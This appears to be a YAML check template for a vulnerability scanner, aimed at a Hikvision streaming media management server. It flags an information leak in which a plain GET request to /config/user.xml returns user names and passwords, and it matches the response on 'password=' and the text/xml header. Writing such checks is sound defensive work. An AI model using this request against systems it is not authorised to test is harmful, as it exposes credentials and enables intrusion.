product: 海康威视流媒体管理服务器
vName: 海康威视流媒体管理服务器 user.xml 账号密码泄漏
type: 信息泄露
vID: [ ]
level: 2
vDesc: Hikvision configuration file was detected.
version: ''
note: ''
search: { }
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /config/user.xml
    verify:
      logic: and
      check:
        - body:
            value:
              - <user name=
              - password=
            logic: and
        - header:
            value:
              - text/xml
            logic: and
